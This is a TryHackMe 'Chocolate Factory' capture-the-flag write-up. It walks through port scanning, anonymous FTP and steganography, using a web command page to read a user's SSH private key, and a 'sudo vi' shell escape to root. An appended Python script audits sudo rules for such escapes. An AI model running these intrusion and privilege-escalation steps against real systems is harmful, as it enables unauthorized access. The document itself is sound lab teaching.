TryHackMe Chocolate Factory WriteUp


Hello and welcome to my first writeup!

Reconnaissance and Enumeration

First, we scan the machine with nmap using the command:

nmap -sV [IP HERE]

nmap scan output:

21/tcp  open  ftp        vsftpd 3.0.3
22/tcp  open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http       Apache httpd 2.4.29 ((Ubuntu))
100/tcp open  newacct?
106/tcp open  pop3pw?
109/tcp open  pop2?
110/tcp open  pop3?
111/tcp open  rpcbind?
113/tcp open  ident?
119/tcp open  nntp?
125/tcp open  locus-map?

FTP enumeration

We log in to FTP with username "anonymous" and password "anonymous".

In the FTP directory we find "gum_room.jpg".

We use steghide to extract hidden data from it:

steghide extract -sf gum_room.jpg

We leave the passphrase empty, and b64.txt is extracted.

It contains what looks like an /etc/shadow file, but we did not find anything useful in it.

Web enumeration

We open the webpage and find a login portal.

I used gobuster to enumerate directories:

gobuster dir -u http://[IP HERE] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html

gobuster: the name of the tool.

dir: specifies that we want to brute-force directories.

-u: specifies the URL.

-w: specifies the wordlist.

-x: looks for files with the given extensions.

Result:

/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 1466]
/home.php             (Status: 200) [Size: 569]
/validate.php         (Status: 200) [Size: 93]

Initial Access:

We navigate to home.php, which lets us run commands.

We try the whoami command.

It works! We search for users in the home directory using "ls /home".

We find the user charlie and list the files using "ls /home/charlie".

"cat /home/charlie/teleport"

Bingo! We found an SSH private key.

I copied it into an id_rsa file, set the right permissions with chmod 600 id_rsa, and tested whether we can log in over SSH as that user. The key works!

In /var/www/html I found a file named key_rev_key and tried to run it.

First I made it executable with chmod +x key_rev_key.

Since it is a binary, we can also check its contents with strings key_rev_key.

Got the key!

b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='

In /var/www/html we cat validate.php.

Running validate.php gives us charlie's password :)

We log in to charlie's account using "su charlie".

user.txt can now be read.


Privilege Escalation:

The first thing to check is sudo -l. Result:

Matching Defaults entries for charlie on chocolate-factory:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User charlie may run the following commands on chocolate-factory:
    (ALL : !root) NOPASSWD: /usr/bin/vi

GTFOBins lists the following shell escape for vi: vi -c ':!/bin/sh' /dev/null

I ran it with sudo so that, if it works, we get root privileges: sudo vi -c ':!/bin/sh' /dev/null

charlie@chocolate-factory:/home/charlie$ sudo vi -c ':!/bin/sh' /dev/null

Pwned!!
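As an added defensive check (my own example, not part of the original room or writeup), the following Python script parses `sudo -l` output like the one above and flags NOPASSWD rules that grant an editor with a known shell escape, so an administrator can catch this misconfiguration before a user does. The sample input is the writeup's own `sudo -l` output; the set of shell-escape binaries is an assumption drawn from GTFOBins.

```python
import re

# Constructed sample input: the `sudo -l` output shown in this writeup.
SUDO_L_OUTPUT = """\
Matching Defaults entries for charlie on chocolate-factory:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User charlie may run the following commands on chocolate-factory:
    (ALL : !root) NOPASSWD: /usr/bin/vi
"""

# Assumption: editors/pagers that can spawn a shell from inside the program
# (all have GTFOBins "sudo" entries). Extend for your environment.
SHELL_ESCAPE_BINARIES = {"vi", "vim", "nano", "less", "more", "man", "ed"}

# A command rule line looks like: "(runas) TAG: /path/to/cmd, /other/cmd"
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:\w+:\s*)*)(.+)$")


def parse_sudo_rules(text):
    """Return one dict per command in the 'may run the following commands' section."""
    rules = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True  # everything after this header is a command rule
            continue
        if not in_commands:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, cmds = m.groups()
        tag_set = {t.strip(": ") for t in tags.split() if t.strip(": ")}
        for cmd in cmds.split(","):
            rules.append({"runas": runas.strip(), "tags": tag_set, "command": cmd.strip()})
    return rules


def audit_sudo_rules(text):
    """Return (command, runas, reason) for every rule granting a shell-escape binary."""
    findings = []
    for rule in parse_sudo_rules(text):
        binary = rule["command"].split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPE_BINARIES:
            reason = f"{binary} allows a shell escape; use sudoedit or a restricted wrapper"
            if "NOPASSWD" in rule["tags"]:
                reason += "; NOPASSWD also removes the password prompt"
            findings.append((rule["command"], rule["runas"], reason))
    return findings
```

Run it against real output with `audit_sudo_rules(subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout)` from an audit account; an empty list means no flagged rules.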

Finding the root flag

We find root.py and run it, enter the key we obtained before, and it shows us the root flag.

Happy Pwning :)
